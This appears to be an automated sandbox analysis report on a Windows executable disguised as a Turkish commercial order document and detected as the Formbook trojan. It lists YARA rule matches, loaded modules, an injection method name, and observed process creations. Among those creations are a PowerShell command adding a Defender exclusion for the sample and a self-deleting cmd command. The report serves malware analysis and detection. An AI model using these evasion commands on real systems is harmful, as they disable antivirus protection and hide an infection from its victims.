Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0384F43F	8_2_0384F43F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03805BF0	8_2_03805BF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037CDBF9	8_2_037CDBF9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0384FB76	8_2_0384FB76
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037AFB80	8_2_037AFB80
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03831AA3	8_2_03831AA3
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0382DAAC	8_2_0382DAAC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0383DAC6	8_2_0383DAC6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03847A46	8_2_03847A46
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0384FA49	8_2_0384FA49
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037D5AA0	8_2_037D5AA0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03803A6C	8_2_03803A6C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03799950	8_2_03799950
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037AB950	8_2_037AB950
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03825910	8_2_03825910
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037FD800	8_2_037FD800
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037938E0	8_2_037938E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0384FFB1	8_2_0384FFB1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0384FF09	8_2_0384FF09
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03791F92	8_2_03791F92
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03799EB0	8_2_03799EB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03793D40	8_2_03793D40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037AFDC0	8_2_037AFDC0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03841D5A	8_2_03841D5A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03847D73	8_2_03847D73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0384FCF2	8_2_0384FCF2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03809C32	8_2_03809C32
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_02E39E60	8_2_02E39E60
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_02E32FB0	8_2_02E32FB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_02E4EDAD	8_2_02E4EDAD
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_02E32D87	8_2_02E32D87
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_02E32D90	8_2_02E32D90
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0362A036	8_2_0362A036
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03625B32	8_2_03625B32
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03625B30	8_2_03625B30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0362B232	8_2_0362B232
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03628912	8_2_03628912
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03621082	8_2_03621082
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03622D02	8_2_03622D02
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0362E5CD	8_2_0362E5CD

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: String function: 0127EA12 appears 86 times
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: String function: 0128F290 appears 105 times
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: String function: 011FB970 appears 280 times
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: String function: 01257E54 appears 111 times
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: String function: 01245130 appears 58 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 0377B970 appears 280 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 037FEA12 appears 86 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 037C5130 appears 58 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 0380F290 appears 105 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 037D7E54 appears 111 times

Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe, 00000000.00000002.2128443100.0000000003BFE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Ticari Siparis Belgesi 26 07 2024 17545000600.exe
Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe, 00000000.00000002.2128019151.0000000002A21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMML.dll2 vs Ticari Siparis Belgesi 26 07 2024 17545000600.exe
Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe, 00000000.00000002.2132665542.0000000005620000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMML.dll2 vs Ticari Siparis Belgesi 26 07 2024 17545000600.exe
Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe, 00000000.00000002.2132961552.0000000006D60000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Ticari Siparis Belgesi 26 07 2024 17545000600.exe
Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe, 00000000.00000002.2128019151.0000000002A6D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMML.dll2 vs Ticari Siparis Belgesi 26 07 2024 17545000600.exe
Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe, 00000006.00000002.2191061034.00000000012FD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Ticari Siparis Belgesi 26 07 2024 17545000600.exe
Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe, 00000006.00000002.2192065955.0000000002F2E000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs Ticari Siparis Belgesi 26 07 2024 17545000600.exe
Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Binary or memory string: OriginalFilenamebBvN.exe: vs Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.4539184982.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4539184982.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.4539184982.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.4538973840.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4538973840.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.4538973840.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2128443100.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2128443100.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2128443100.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.4539570666.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4539570666.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.4539570666.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4556728675.000000001047C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000006.00000002.2190313721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2190313721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2190313721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Ticari Siparis Belgesi 26 07 2024 17545000600.exe PID: 6520, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: Ticari Siparis Belgesi 26 07 2024 17545000600.exe PID: 3116, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 7364, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, oOSLaJiXYcsR9gu6Ws.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, BZGao2DXdnGg50S4nE.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, BZGao2DXdnGg50S4nE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, BZGao2DXdnGg50S4nE.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, BZGao2DXdnGg50S4nE.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, BZGao2DXdnGg50S4nE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, BZGao2DXdnGg50S4nE.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, oOSLaJiXYcsR9gu6Ws.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, oOSLaJiXYcsR9gu6Ws.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, BZGao2DXdnGg50S4nE.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, BZGao2DXdnGg50S4nE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, BZGao2DXdnGg50S4nE.cs	Security API names: _0020.AddAccessRule

Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d40000.10.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.2a8a338.6.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.2aa9504.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.evad.winEXE@13/6@12/3

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 8_2_007BA759 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,

8_2_007BA759

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ticari Siparis Belgesi 26 07 2024 17545000600.exe.log

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2q4x0gu.y4z.ps1

Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe

ReversingLabs: Detection: 76%

Source: unknown	Process created: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe "C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process created: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe "C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process created: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe "C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process created: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe "C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process created: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe "C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: sspicli.dll	Jump to behavior
